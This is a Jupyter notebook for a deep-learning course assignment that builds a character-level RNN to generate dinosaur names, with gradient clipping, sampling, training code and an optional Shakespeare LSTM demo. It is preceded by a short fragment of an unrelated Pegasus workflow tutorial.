!mv f-problem.a f.a
```
## 3. Restart the workflow
We can now restart the workflow from where it stopped. Alternativly to the `run()`, you could `plan()` a new instance, but in that case the workflow would start all the way from the beginning again.
```
try:
wf.run() \
.wait()
except PegasusClientError as e:
print(e)
```
## What's Next?
To continue exploring Pegasus, and specifically learn how to debug failed workflows, please open the notebook in `03-Command-Line-Tools/`
| github_jupyter |
# Character level language model - Dinosaurus Island
Welcome to Dinosaurus Island! 65 million years ago, dinosaurs existed, and in this assignment they are back. You are in charge of a special task. Leading biology researchers are creating new breeds of dinosaurs and bringing them to life on earth, and your job is to give names to these dinosaurs. If a dinosaur does not like its name, it might go berserk, so choose wisely!
<table>
<td>
<img src="images/dino.jpg" style="width:250;height:300px;">
</td>
</table>
Luckily you have learned some deep learning and you will use it to save the day. Your assistant has collected a list of all the dinosaur names they could find, and compiled them into this [dataset](dinos.txt). (Feel free to take a look by clicking the previous link.) To create new dinosaur names, you will build a character level language model to generate new names. Your algorithm will learn the different name patterns, and randomly generate new names. Hopefully this algorithm will keep you and your team safe from the dinosaurs' wrath!
By completing this assignment you will learn:
- How to store text data for processing using an RNN
- How to synthesize data, by sampling predictions at each time step and passing it to the next RNN-cell unit
- How to build a character-level text generation recurrent neural network
- Why clipping the gradients is important
We will begin by loading in some functions that we have provided for you in `rnn_utils`. Specifically, you have access to functions such as `rnn_forward` and `rnn_backward` which are equivalent to those you've implemented in the previous assignment.
## <font color='darkblue'>Updates</font>
#### If you were working on the notebook before this update...
* The current notebook is version "3b".
* You can find your original work saved in the notebook with the previous version name ("v3a")
* To view the file directory, go to the menu "File->Open", and this will open a new tab that shows the file directory.
#### List of updates 3b
- removed redundant numpy import
* `clip`
- change test code to use variable name 'mvalue' rather than 'maxvalue' and deleted it from namespace to avoid confusion.
* `optimize`
- removed redundant description of clip function to discourage use of using 'maxvalue' which is not an argument to optimize
* `model`
- added 'verbose mode to print X,Y to aid in creating that code.
- wordsmith instructions to prevent confusion
- 2000 examples vs 100, 7 displayed vs 10
- no randomization of order
* `sample`
- removed comments regarding potential different sample outputs to reduce confusion.
```
import numpy as np
from utils import *
import random
import pprint
```
## 1 - Problem Statement
### 1.1 - Dataset and Preprocessing
Run the following cell to read the dataset of dinosaur names, create a list of unique characters (such as a-z), and compute the dataset and vocabulary size.
```
data = open('dinos.txt', 'r').read()
data= data.lower()
chars = list(set(data))
data_size, vocab_size = len(data), len(chars)
print('There are %d total characters and %d unique characters in your data.' % (data_size, vocab_size))
```
* The characters are a-z (26 characters) plus the "\n" (or newline character).
* In this assignment, the newline character "\n" plays a role similar to the `<EOS>` (or "End of sentence") token we had discussed in lecture.
- Here, "\n" indicates the end of the dinosaur name rather than the end of a sentence.
* `char_to_ix`: In the cell below, we create a python dictionary (i.e., a hash table) to map each character to an index from 0-26.
* `ix_to_char`: We also create a second python dictionary that maps each index back to the corresponding character.
- This will help you figure out what index corresponds to what character in the probability distribution output of the softmax layer.
```
chars = sorted(chars)
print(chars)
char_to_ix = { ch:i for i,ch in enumerate(chars) }
ix_to_char = { i:ch for i,ch in enumerate(chars) }
pp = pprint.PrettyPrinter(indent=4)
pp.pprint(ix_to_char)
```
### 1.2 - Overview of the model
Your model will have the following structure:
- Initialize parameters
- Run the optimization loop
- Forward propagation to compute the loss function
- Backward propagation to compute the gradients with respect to the loss function
- Clip the gradients to avoid exploding gradients
- Using the gradients, update your parameters with the gradient descent update rule.
- Return the learned parameters
<img src="images/rnn.png" style="width:450;height:300px;">
<caption><center> **Figure 1**: Recurrent Neural Network, similar to what you had built in the previous notebook "Building a Recurrent Neural Network - Step by Step". </center></caption>
* At each time-step, the RNN tries to predict what is the next character given the previous characters.
* The dataset $\mathbf{X} = (x^{\langle 1 \rangle}, x^{\langle 2 \rangle}, ..., x^{\langle T_x \rangle})$ is a list of characters in the training set.
* $\mathbf{Y} = (y^{\langle 1 \rangle}, y^{\langle 2 \rangle}, ..., y^{\langle T_x \rangle})$ is the same list of characters but shifted one character forward.
* At every time-step $t$, $y^{\langle t \rangle} = x^{\langle t+1 \rangle}$. The prediction at time $t$ is the same as the input at time $t + 1$.
## 2 - Building blocks of the model
In this part, you will build two important blocks of the overall model:
- Gradient clipping: to avoid exploding gradients
- Sampling: a technique used to generate characters
You will then apply these two functions to build the model.
### 2.1 - Clipping the gradients in the optimization loop
In this section you will implement the `clip` function that you will call inside of your optimization loop.
#### Exploding gradients
* When gradients are very large, they're called "exploding gradients."
* Exploding gradients make the training process more difficult, because the updates may be so large that they "overshoot" the optimal values during back propagation.
Recall that your overall loop structure usually consists of:
* forward pass,
* cost computation,
* backward pass,
* parameter update.
Before updating the parameters, you will perform gradient clipping to make sure that your gradients are not "exploding."
#### gradient clipping
In the exercise below, you will implement a function `clip` that takes in a dictionary of gradients and returns a clipped version of gradients if needed.
* There are different ways to clip gradients.
* We will use a simple element-wise clipping procedure, in which every element of the gradient vector is clipped to lie between some range [-N, N].
* For example, if the N=10
- The range is [-10, 10]
- If any component of the gradient vector is greater than 10, it is set to 10.
- If any component of the gradient vector is less than -10, it is set to -10.
- If any components are between -10 and 10, they keep their original values.
<img src="images/clip.png" style="width:400;height:150px;">
<caption><center> **Figure 2**: Visualization of gradient descent with and without gradient clipping, in a case where the network is running into "exploding gradient" problems. </center></caption>
**Exercise**:
Implement the function below to return the clipped gradients of your dictionary `gradients`.
* Your function takes in a maximum threshold and returns the clipped versions of the gradients.
* You can check out [numpy.clip](https://docs.scipy.org/doc/numpy-1.13.0/reference/generated/numpy.clip.html).
- You will need to use the argument "`out = ...`".
- Using the "`out`" parameter allows you to update a variable "in-place".
- If you don't use "`out`" argument, the clipped variable is stored in the variable "gradient" but does not update the gradient variables `dWax`, `dWaa`, `dWya`, `db`, `dby`.
```
### GRADED FUNCTION: clip
def clip(gradients, maxValue):
'''
Clips the gradients' values between minimum and maximum.
Arguments:
gradients -- a dictionary containing the gradients "dWaa", "dWax", "dWya", "db", "dby"
maxValue -- everything above this number is set to this number, and everything less than -maxValue is set to -maxValue
Returns:
gradients -- a dictionary with the clipped gradients.
'''
dWaa, dWax, dWya, db, dby = gradients['dWaa'], gradients['dWax'], gradients['dWya'], gradients['db'], gradients['dby']
### START CODE HERE ###
# clip to mitigate exploding gradients, loop over [dWax, dWaa, dWya, db, dby]. (≈2 lines)
for gradient in [dWaa, dWax, dWya, db, dby]:
np.clip(gradient,maxValue*-1,maxValue,out=gradient)
### END CODE HERE ###
gradients = {"dWaa": dWaa, "dWax": dWax, "dWya": dWya, "db": db, "dby": dby}
return gradients
# Test with a maxvalue of 10
mValue = 10
np.random.seed(3)
dWax = np.random.randn(5,3)*10
dWaa = np.random.randn(5,5)*10
dWya = np.random.randn(2,5)*10
db = np.random.randn(5,1)*10
dby = np.random.randn(2,1)*10
gradients = {"dWax": dWax, "dWaa": dWaa, "dWya": dWya, "db": db, "dby": dby}
gradients = clip(gradients, mValue)
print("gradients[\"dWaa\"][1][2] =", gradients["dWaa"][1][2])
print("gradients[\"dWax\"][3][1] =", gradients["dWax"][3][1])
print("gradients[\"dWya\"][1][2] =", gradients["dWya"][1][2])
print("gradients[\"db\"][4] =", gradients["db"][4])
print("gradients[\"dby\"][1] =", gradients["dby"][1])
```
** Expected output:**
```Python
gradients["dWaa"][1][2] = 10.0
gradients["dWax"][3][1] = -10.0
gradients["dWya"][1][2] = 0.29713815361
gradients["db"][4] = [ 10.]
gradients["dby"][1] = [ 8.45833407]
```
```
# Test with a maxValue of 5
mValue = 5
np.random.seed(3)
dWax = np.random.randn(5,3)*10
dWaa = np.random.randn(5,5)*10
dWya = np.random.randn(2,5)*10
db = np.random.randn(5,1)*10
dby = np.random.randn(2,1)*10
gradients = {"dWax": dWax, "dWaa": dWaa, "dWya": dWya, "db": db, "dby": dby}
gradients = clip(gradients, mValue)
print("gradients[\"dWaa\"][1][2] =", gradients["dWaa"][1][2])
print("gradients[\"dWax\"][3][1] =", gradients["dWax"][3][1])
print("gradients[\"dWya\"][1][2] =", gradients["dWya"][1][2])
print("gradients[\"db\"][4] =", gradients["db"][4])
print("gradients[\"dby\"][1] =", gradients["dby"][1])
del mValue # avoid common issue
```
** Expected Output: **
```Python
gradients["dWaa"][1][2] = 5.0
gradients["dWax"][3][1] = -5.0
gradients["dWya"][1][2] = 0.29713815361
gradients["db"][4] = [ 5.]
gradients["dby"][1] = [ 5.]
```
### 2.2 - Sampling
Now assume that your model is trained. You would like to generate new text (characters). The process of generation is explained in the picture below:
<img src="images/dinos3.png" style="width:500;height:300px;">
<caption><center> **Figure 3**: In this picture, we assume the model is already trained. We pass in $x^{\langle 1\rangle} = \vec{0}$ at the first time step, and have the network sample one character at a time. </center></caption>
**Exercise**: Implement the `sample` function below to sample characters. You need to carry out 4 steps:
- **Step 1**: Input the "dummy" vector of zeros $x^{\langle 1 \rangle} = \vec{0}$.
- This is the default input before we've generated any characters.
We also set $a^{\langle 0 \rangle} = \vec{0}$
- **Step 2**: Run one step of forward propagation to get $a^{\langle 1 \rangle}$ and $\hat{y}^{\langle 1 \rangle}$. Here are the equations:
hidden state:
$$ a^{\langle t+1 \rangle} = \tanh(W_{ax} x^{\langle t+1 \rangle } + W_{aa} a^{\langle t \rangle } + b)\tag{1}$$
activation:
$$ z^{\langle t + 1 \rangle } = W_{ya} a^{\langle t + 1 \rangle } + b_y \tag{2}$$
prediction:
$$ \hat{y}^{\langle t+1 \rangle } = softmax(z^{\langle t + 1 \rangle })\tag{3}$$
- Details about $\hat{y}^{\langle t+1 \rangle }$:
- Note that $\hat{y}^{\langle t+1 \rangle }$ is a (softmax) probability vector (its entries are between 0 and 1 and sum to 1).
- $\hat{y}^{\langle t+1 \rangle}_i$ represents the probability that the character indexed by "i" is the next character.
- We have provided a `softmax()` function that you can use.
#### Additional Hints
- $x^{\langle 1 \rangle}$ is `x` in the code. When creating the one-hot vector, make a numpy array of zeros, with the number of rows equal to the number of unique characters, and the number of columns equal to one. It's a 2D and not a 1D array.
- $a^{\langle 0 \rangle}$ is `a_prev` in the code. It is a numpy array of zeros, where the number of rows is $n_{a}$, and number of columns is 1. It is a 2D array as well. $n_{a}$ is retrieved by getting the number of columns in $W_{aa}$ (the numbers need to match in order for the matrix multiplication $W_{aa}a^{\langle t \rangle}$ to work.
- [numpy.dot](https://docs.scipy.org/doc/numpy/reference/generated/numpy.dot.html)
- [numpy.tanh](https://docs.scipy.org/doc/numpy/reference/generated/numpy.tanh.html)
#### Using 2D arrays instead of 1D arrays
* You may be wondering why we emphasize that $x^{\langle 1 \rangle}$ and $a^{\langle 0 \rangle}$ are 2D arrays and not 1D vectors.
* For matrix multiplication in numpy, if we multiply a 2D matrix with a 1D vector, we end up with with a 1D array.
* This becomes a problem when we add two arrays where we expected them to have the same shape.
* When two arrays with a different number of dimensions are added together, Python "broadcasts" one across the other.
* Here is some sample code that shows the difference between using a 1D and 2D array.
```
matrix1 = np.array([[1,1],[2,2],[3,3]]) # (3,2)
matrix2 = np.array([[0],[0],[0]]) # (3,1)
vector1D = np.array([1,1]) # (2,)
vector2D = np.array([[1],[1]]) # (2,1)
print("matrix1 \n", matrix1,"\n")
print("matrix2 \n", matrix2,"\n")
print("vector1D \n", vector1D,"\n")
print("vector2D \n", vector2D)
print("Multiply 2D and 1D arrays: result is a 1D array\n",
np.dot(matrix1,vector1D))
print("Multiply 2D and 2D arrays: result is a 2D array\n",
np.dot(matrix1,vector2D))
print("Adding (3 x 1) vector to a (3 x 1) vector is a (3 x 1) vector\n",
"This is what we want here!\n",
np.dot(matrix1,vector2D) + matrix2)
print("Adding a (3,) vector to a (3 x 1) vector\n",
"broadcasts the 1D array across the second dimension\n",
"Not what we want here!\n",
np.dot(matrix1,vector1D) + matrix2
)
```
- **Step 3**: Sampling:
- Now that we have $y^{\langle t+1 \rangle}$, we want to select the next letter in the dinosaur name. If we select the most probable, the model will always generate the same result given a starting letter. To make the results more interesting, we will use np.random.choice to select a next letter that is *likely*, but not always the same.
- Pick the next character's **index** according to the probability distribution specified by $\hat{y}^{\langle t+1 \rangle }$.
- This means that if $\hat{y}^{\langle t+1 \rangle }_i = 0.16$, you will pick the index "i" with 16% probability.
- Use [np.random.choice](https://docs.scipy.org/doc/numpy-1.13.0/reference/generated/numpy.random.choice.html).
Example of how to use `np.random.choice()`:
```python
np.random.seed(0)
probs = np.array([0.1, 0.0, 0.7, 0.2])
idx = np.random.choice(range(len((probs)), p = probs)
```
- This means that you will pick the index (`idx`) according to the distribution:
$P(index = 0) = 0.1, P(index = 1) = 0.0, P(index = 2) = 0.7, P(index = 3) = 0.2$.
- Note that the value that's set to `p` should be set to a 1D vector.
- Also notice that $\hat{y}^{\langle t+1 \rangle}$, which is `y` in the code, is a 2D array.
- Also notice, while in your implementation, the first argument to np.random.choice is just an ordered list [0,1,.., vocab_len-1], it is *Not* appropriate to use char_to_ix.values(). The *order* of values returned by a python dictionary .values() call will be the same order as they are added to the dictionary. The grader may have a different order when it runs your routine than when you run it in your notebook.
##### Additional Hints
- [range](https://docs.python.org/3/library/functions.html#func-range)
- [numpy.ravel](https://docs.scipy.org/doc/numpy/reference/generated/numpy.ravel.html) takes a multi-dimensional array and returns its contents inside of a 1D vector.
```Python
arr = np.array([[1,2],[3,4]])
print("arr")
print(arr)
print("arr.ravel()")
print(arr.ravel())
```
Output:
```Python
arr
[[1 2]
[3 4]]
arr.ravel()
[1 2 3 4]
```
- Note that `append` is an "in-place" operation. In other words, don't do this:
```Python
fun_hobbies = fun_hobbies.append('learning') ## Doesn't give you what you want
```
- **Step 4**: Update to $x^{\langle t \rangle }$
- The last step to implement in `sample()` is to update the variable `x`, which currently stores $x^{\langle t \rangle }$, with the value of $x^{\langle t + 1 \rangle }$.
- You will represent $x^{\langle t + 1 \rangle }$ by creating a one-hot vector corresponding to the character that you have chosen as your prediction.
- You will then forward propagate $x^{\langle t + 1 \rangle }$ in Step 1 and keep repeating the process until you get a "\n" character, indicating that you have reached the end of the dinosaur name.
##### Additional Hints
- In order to reset `x` before setting it to the new one-hot vector, you'll want to set all the values to zero.
- You can either create a new numpy array: [numpy.zeros](https://docs.scipy.org/doc/numpy/reference/generated/numpy.zeros.html)
- Or fill all values with a single number: [numpy.ndarray.fill](https://docs.scipy.org/doc/numpy/reference/generated/numpy.ndarray.fill.html)
```
# GRADED FUNCTION: sample
def sample(parameters, char_to_ix, seed):
"""
Sample a sequence of characters according to a sequence of probability distributions output of the RNN
Arguments:
parameters -- python dictionary containing the parameters Waa, Wax, Wya, by, and b.
char_to_ix -- python dictionary mapping each character to an index.
seed -- used for grading purposes. Do not worry about it.
Returns:
indices -- a list of length n containing the indices of the sampled characters.
"""
# Retrieve parameters and relevant shapes from "parameters" dictionary
Waa, Wax, Wya, by, b = parameters['Waa'], parameters['Wax'], parameters['Wya'], parameters['by'], parameters['b']
vocab_size = by.shape[0]
n_a = Waa.shape[1]
### START CODE HERE ###
# Step 1: Create the a zero vector x that can be used as the one-hot vector
# representing the first character (initializing the sequence generation). (≈1 line)
x = np.zeros((vocab_size,1))
# Step 1': Initialize a_prev as zeros (≈1 line)
a_prev = np.zeros((n_a,1))
# Create an empty list of indices, this is the list which will contain the list of indices of the characters to generate (≈1 line)
indices = []
# idx is the index of the one-hot vector x that is set to 1
# All other positions in x are zero.
# We will initialize idx to -1
idx = -1
# Loop over time-steps t. At each time-step:
# sample a character from a probability distribution
# and append its index (`idx`) to the list "indices".
# We'll stop if we reach 50 characters
# (which should be very unlikely with a well trained model).
# Setting the maximum number of characters helps with debugging and prevents infinite loops.
counter = 0
newline_character = char_to_ix['\n']
while (idx != newline_character and counter != 50):
# Step 2: Forward propagate x using the equations (1), (2) and (3)
a = np.tanh(np.dot(Wax,x)+np.dot(Waa,a_prev)+b)
z = np.dot(Wya,a)+by
y = softmax(z)
# for grading purposes
np.random.seed(counter+seed)
# Step 3: Sample the index of a character within the vocabulary from the probability distribution y
# (see additional hints above)
idx = np.random.choice(range(len(y)),p=y.ravel())
# Append the index to "indices"
indices.append(idx)
# Step 4: Overwrite the input x with one that corresponds to the sampled index `idx`.
# (see additional hints above)
x = np.zeros((vocab_size,1))
x[idx] = 1
# Update "a_prev" to be "a"
a_prev = a
# for grading purposes
seed += 1
counter +=1
### END CODE HERE ###
if (counter == 50):
indices.append(char_to_ix['\n'])
return indices
np.random.seed(2)
_, n_a = 20, 100
Wax, Waa, Wya = np.random.randn(n_a, vocab_size), np.random.randn(n_a, n_a), np.random.randn(vocab_size, n_a)
b, by = np.random.randn(n_a, 1), np.random.randn(vocab_size, 1)
parameters = {"Wax": Wax, "Waa": Waa, "Wya": Wya, "b": b, "by": by}
indices = sample(parameters, char_to_ix, 0)
print("Sampling:")
print("list of sampled indices:\n", indices)
print("list of sampled characters:\n", [ix_to_char[i] for i in indices])
```
** Expected output:**
```Python
Sampling:
list of sampled indices:
[12, 17, 24, 14, 13, 9, 10, 22, 24, 6, 13, 11, 12, 6, 21, 15, 21, 14, 3, 2, 1, 21, 18, 24, 7, 25, 6, 25, 18, 10, 16, 2, 3, 8, 15, 12, 11, 7, 1, 12, 10, 2, 7, 7, 11, 17, 24, 12, 13, 24, 0]
list of sampled characters:
['l', 'q', 'x', 'n', 'm', 'i', 'j', 'v', 'x', 'f', 'm', 'k', 'l', 'f', 'u', 'o', 'u', 'n', 'c', 'b', 'a', 'u', 'r', 'x', 'g', 'y', 'f', 'y', 'r', 'j', 'p', 'b', 'c', 'h', 'o', 'l', 'k', 'g', 'a', 'l', 'j', 'b', 'g', 'g', 'k', 'q', 'x', 'l', 'm', 'x', '\n']
```
## 3 - Building the language model
It is time to build the character-level language model for text generation.
### 3.1 - Gradient descent
* In this section you will implement a function performing one step of stochastic gradient descent (with clipped gradients).
* You will go through the training examples one at a time, so the optimization algorithm will be stochastic gradient descent.
As a reminder, here are the steps of a common optimization loop for an RNN:
- Forward propagate through the RNN to compute the loss
- Backward propagate through time to compute the gradients of the loss with respect to the parameters
- Clip the gradients
- Update the parameters using gradient descent
**Exercise**: Implement the optimization process (one step of stochastic gradient descent).
The following functions are provided:
```python
def rnn_forward(X, Y, a_prev, parameters):
""" Performs the forward propagation through the RNN and computes the cross-entropy loss.
It returns the loss' value as well as a "cache" storing values to be used in backpropagation."""
....
return loss, cache
def rnn_backward(X, Y, parameters, cache):
""" Performs the backward propagation through time to compute the gradients of the loss with respect
to the parameters. It returns also all the hidden states."""
...
return gradients, a
def update_parameters(parameters, gradients, learning_rate):
""" Updates parameters using the Gradient Descent Update Rule."""
...
return parameters
```
Recall that you previously implemented the `clip` function:
#### parameters
* Note that the weights and biases inside the `parameters` dictionary are being updated by the optimization, even though `parameters` is not one of the returned values of the `optimize` function. The `parameters` dictionary is passed by reference into the function, so changes to this dictionary are making changes to the `parameters` dictionary even when accessed outside of the function.
* Python dictionaries and lists are "pass by reference", which means that if you pass a dictionary into a function and modify the dictionary within the function, this changes that same dictionary (it's not a copy of the dictionary).
```
# GRADED FUNCTION: optimize
def optimize(X, Y, a_prev, parameters, learning_rate = 0.01):
"""
Execute one step of the optimization to train the model.
Arguments:
X -- list of integers, where each integer is a number that maps to a character in the vocabulary.
Y -- list of integers, exactly the same as X but shifted one index to the left.
a_prev -- previous hidden state.
parameters -- python dictionary containing:
Wax -- Weight matrix multiplying the input, numpy array of shape (n_a, n_x)
Waa -- Weight matrix multiplying the hidden state, numpy array of shape (n_a, n_a)
Wya -- Weight matrix relating the hidden-state to the output, numpy array of shape (n_y, n_a)
b -- Bias, numpy array of shape (n_a, 1)
by -- Bias relating the hidden-state to the output, numpy array of shape (n_y, 1)
learning_rate -- learning rate for the model.
Returns:
loss -- value of the loss function (cross-entropy)
gradients -- python dictionary containing:
dWax -- Gradients of input-to-hidden weights, of shape (n_a, n_x)
dWaa -- Gradients of hidden-to-hidden weights, of shape (n_a, n_a)
dWya -- Gradients of hidden-to-output weights, of shape (n_y, n_a)
db -- Gradients of bias vector, of shape (n_a, 1)
dby -- Gradients of output bias vector, of shape (n_y, 1)
a[len(X)-1] -- the last hidden state, of shape (n_a, 1)
"""
### START CODE HERE ###
# Forward propagate through time (≈1 line)
loss, cache = rnn_forward(X,Y,a_prev,parameters)
# Backpropagate through time (≈1 line)
gradients, a = rnn_backward(X, Y, parameters, cache)
# Clip your gradients between -5 (min) and 5 (max) (≈1 line)
gradients = clip(gradients,5)
# Update parameters (≈1 line)
parameters = update_parameters(parameters, gradients, learning_rate)
### END CODE HERE ###
return loss, gradients, a[len(X)-1]
np.random.seed(1)
vocab_size, n_a = 27, 100
a_prev = np.random.randn(n_a, 1)
Wax, Waa, Wya = np.random.randn(n_a, vocab_size), np.random.randn(n_a, n_a), np.random.randn(vocab_size, n_a)
b, by = np.random.randn(n_a, 1), np.random.randn(vocab_size, 1)
parameters = {"Wax": Wax, "Waa": Waa, "Wya": Wya, "b": b, "by": by}
X = [12,3,5,11,22,3]
Y = [4,14,11,22,25, 26]
loss, gradients, a_last = optimize(X, Y, a_prev, parameters, learning_rate = 0.01)
print("Loss =", loss)
print("gradients[\"dWaa\"][1][2] =", gradients["dWaa"][1][2])
print("np.argmax(gradients[\"dWax\"]) =", np.argmax(gradients["dWax"]))
print("gradients[\"dWya\"][1][2] =", gradients["dWya"][1][2])
print("gradients[\"db\"][4] =", gradients["db"][4])
print("gradients[\"dby\"][1] =", gradients["dby"][1])
print("a_last[4] =", a_last[4])
```
** Expected output:**
```Python
Loss = 126.503975722
gradients["dWaa"][1][2] = 0.194709315347
np.argmax(gradients["dWax"]) = 93
gradients["dWya"][1][2] = -0.007773876032
gradients["db"][4] = [-0.06809825]
gradients["dby"][1] = [ 0.01538192]
a_last[4] = [-1.]
```
### 3.2 - Training the model
* Given the dataset of dinosaur names, we use each line of the dataset (one name) as one training example.
* Every 2000 steps of stochastic gradient descent, you will sample several randomly chosen names to see how the algorithm is doing.
**Exercise**: Follow the instructions and implement `model()`. When `examples[index]` contains one dinosaur name (string), to create an example (X, Y), you can use this:
##### Set the index `idx` into the list of examples
* Using the for-loop, walk through the shuffled list of dinosaur names in the list "examples".
* For example, if there are n_e examples, and the for-loop increments the index to n_e onwards, think of how you would make the index cycle back to 0, so that we can continue feeding the examples into the model when j is n_e, n_e + 1, etc.
* Hint: n_e + 1 divided by n_e is zero with a remainder of 1.
* `%` is the modulus operator in python.
##### Extract a single example from the list of examples
* `single_example`: use the `idx` index that you set previously to get one word from the list of examples.
##### Convert a string into a list of characters: `single_example_chars`
* `single_example_chars`: A string is a list of characters.
* You can use a list comprehension (recommended over for-loops) to generate a list of characters.
```Python
str = 'I love learning'
list_of_chars = [c for c in str]
print(list_of_chars)
```
```
['I', ' ', 'l', 'o', 'v', 'e', ' ', 'l', 'e', 'a', 'r', 'n', 'i', 'n', 'g']
```
##### Convert list of characters to a list of integers: `single_example_ix`
* Create a list that contains the index numbers associated with each character.
* Use the dictionary `char_to_ix`
* You can combine this with the list comprehension that is used to get a list of characters from a string.
##### Create the list of input characters: `X`
* `rnn_forward` uses the **`None`** value as a flag to set the input vector as a zero-vector.
* Prepend the list [**`None`**] in front of the list of input characters.
* There is more than one way to prepend a value to a list. One way is to add two lists together: `['a'] + ['b']`
##### Get the integer representation of the newline character `ix_newline`
* `ix_newline`: The newline character signals the end of the dinosaur name.
- get the integer representation of the newline character `'\n'`.
- Use `char_to_ix`
##### Set the list of labels (integer representation of the characters): `Y`
* The goal is to train the RNN to predict the next letter in the name, so the labels are the list of characters that are one time step ahead of the characters in the input `X`.
- For example, `Y[0]` contains the same value as `X[1]`
* The RNN should predict a newline at the last letter so add ix_newline to the end of the labels.
- Append the integer representation of the newline character to the end of `Y`.
- Note that `append` is an in-place operation.
- It might be easier for you to add two lists together.
```
# GRADED FUNCTION: model
def model(data, ix_to_char, char_to_ix, num_iterations = 35000, n_a = 50, dino_names = 7, vocab_size = 27, verbose = False):
"""
Trains the model and generates dinosaur names.
Arguments:
data -- text corpus
ix_to_char -- dictionary that maps the index to a character
char_to_ix -- dictionary that maps a character to an index
num_iterations -- number of iterations to train the model for
n_a -- number of units of the RNN cell
dino_names -- number of dinosaur names you want to sample at each iteration.
vocab_size -- number of unique characters found in the text (size of the vocabulary)
Returns:
parameters -- learned parameters
"""
# Retrieve n_x and n_y from vocab_size
n_x, n_y = vocab_size, vocab_size
# Initialize parameters
parameters = initialize_parameters(n_a, n_x, n_y)
# Initialize loss (this is required because we want to smooth our loss)
loss = get_initial_loss(vocab_size, dino_names)
# Build list of all dinosaur names (training examples).
with open("dinos.txt") as f:
examples = f.readlines()
examples = [x.lower().strip() for x in examples]
# Shuffle list of all dinosaur names
np.random.seed(0)
np.random.shuffle(examples)
# Initialize the hidden state of your LSTM
a_prev = np.zeros((n_a, 1))
# Optimization loop
for j in range(num_iterations):
### START CODE HERE ###
# Set the index `idx` (see instructions above)
idx = j%len(examples)
# Set the input X (see instructions above)
single_example = examples[idx]
single_example_chars = [c for c in single_example]
single_example_ix = [char_to_ix[c] for c in single_example]
X = [None]+single_example_ix
# Set the labels Y (see instructions above)
ix_newline = [char_to_ix["\n"]]
Y = X[1:]+ix_newline
# Perform one optimization step: Forward-prop -> Backward-prop -> Clip -> Update parameters
# Choose a learning rate of 0.01
curr_loss, gradients, a_prev = optimize(X,Y,a_prev,parameters,learning_rate=0.01)
### END CODE HERE ###
# debug statements to aid in correctly forming X, Y
if verbose and j in [0, len(examples) -1, len(examples)]:
print("j = " , j, "idx = ", idx,)
if verbose and j in [0]:
print("single_example =", single_example)
print("single_example_chars", single_example_chars)
print("single_example_ix", single_example_ix)
print(" X = ", X, "\n", "Y = ", Y, "\n")
# Use a latency trick to keep the loss smooth. It happens here to accelerate the training.
loss = smooth(loss, curr_loss)
# Every 2000 Iteration, generate "n" characters thanks to sample() to check if the model is learning properly
if j % 2000 == 0:
print('Iteration: %d, Loss: %f' % (j, loss) + '\n')
# The number of dinosaur names to print
seed = 0
for name in range(dino_names):
# Sample indices and print them
sampled_indices = sample(parameters, char_to_ix, seed)
print_sample(sampled_indices, ix_to_char)
seed += 1 # To get the same result (for grading purposes), increment the seed by one.
print('\n')
return parameters
```
Run the following cell, you should observe your model outputting random-looking characters at the first iteration. After a few thousand iterations, your model should learn to generate reasonable-looking names.
```
parameters = model(data, ix_to_char, char_to_ix, verbose = True)
```
** Expected Output**
```Python
j = 0 idx = 0
single_example = turiasaurus
single_example_chars ['t', 'u', 'r', 'i', 'a', 's', 'a', 'u', 'r', 'u', 's']
single_example_ix [20, 21, 18, 9, 1, 19, 1, 21, 18, 21, 19]
X = [None, 20, 21, 18, 9, 1, 19, 1, 21, 18, 21, 19]
Y = [20, 21, 18, 9, 1, 19, 1, 21, 18, 21, 19, 0]
Iteration: 0, Loss: 23.087336
Nkzxwtdmfqoeyhsqwasjkjvu
Kneb
Kzxwtdmfqoeyhsqwasjkjvu
Neb
Zxwtdmfqoeyhsqwasjkjvu
Eb
Xwtdmfqoeyhsqwasjkjvu
j = 1535 idx = 1535
j = 1536 idx = 0
Iteration: 2000, Loss: 27.884160
...
Iteration: 34000, Loss: 22.447230
Onyxipaledisons
Kiabaeropa
Lussiamang
Pacaeptabalsaurus
Xosalong
Eiacoteg
Troia
```
## Conclusion
You can see that your algorithm has started to generate plausible dinosaur names towards the end of the training. At first, it was generating random characters, but towards the end you could see dinosaur names with cool endings. Feel free to run the algorithm even longer and play with hyperparameters to see if you can get even better results. Our implementation generated some really cool names like `maconucon`, `marloralus` and `macingsersaurus`. Your model hopefully also learned that dinosaur names tend to end in `saurus`, `don`, `aura`, `tor`, etc.
If your model generates some non-cool names, don't blame the model entirely--not all actual dinosaur names sound cool. (For example, `dromaeosauroides` is an actual dinosaur name and is in the training set.) But this model should give you a set of candidates from which you can pick the coolest!
This assignment had used a relatively small dataset, so that you could train an RNN quickly on a CPU. Training a model of the english language requires a much bigger dataset, and usually needs much more computation, and could run for many hours on GPUs. We ran our dinosaur name for quite some time, and so far our favorite name is the great, undefeatable, and fierce: Mangosaurus!
<img src="images/mangosaurus.jpeg" style="width:250;height:300px;">
## 4 - Writing like Shakespeare
The rest of this notebook is optional and is not graded, but we hope you'll do it anyway since it's quite fun and informative.
A similar (but more complicated) task is to generate Shakespeare poems. Instead of learning from a dataset of Dinosaur names you can use a collection of Shakespearian poems. Using LSTM cells, you can learn longer term dependencies that span many characters in the text--e.g., where a character appearing somewhere a sequence can influence what should be a different character much much later in the sequence. These long term dependencies were less important with dinosaur names, since the names were quite short.
<img src="images/shakespeare.jpg" style="width:500;height:400px;">
<caption><center> Let's become poets! </center></caption>
We have implemented a Shakespeare poem generator with Keras. Run the following cell to load the required packages and models. This may take a few minutes.
```
from __future__ import print_function
from keras.callbacks import LambdaCallback
from keras.models import Model, load_model, Sequential
from keras.layers import Dense, Activation, Dropout, Input, Masking
from keras.layers import LSTM
from keras.utils.data_utils import get_file
from keras.preprocessing.sequence import pad_sequences
from shakespeare_utils import *
import sys
import io
```
To save you some time, we have already trained a model for ~1000 epochs on a collection of Shakespearian poems called [*"The Sonnets"*](shakespeare.txt).
Let's train the model for one more epoch. When it finishes training for an epoch---this will also take a few minutes---you can run `generate_output`, which will prompt asking you for an input (`<`40 characters). The poem will start with your sentence, and our RNN-Shakespeare will complete the rest of the poem for you! For example, try "Forsooth this maketh no sense " (don't enter the quotation marks). Depending on whether you include the space at the end, your results might also differ--try it both ways, and try other inputs as well.
```
print_callback = LambdaCallback(on_epoch_end=on_epoch_end)
model.fit(x, y, batch_size=128, epochs=1, callbacks=[print_callback])
# Run this cell to try with different inputs without having to re-train the model
generate_output()
```
The RNN-Shakespeare model is very similar to the one you have built for dinosaur names. The only major differences are:
- LSTMs instead of the basic RNN to capture longer-range dependencies
- The model is a deeper, stacked LSTM model (2 layer)
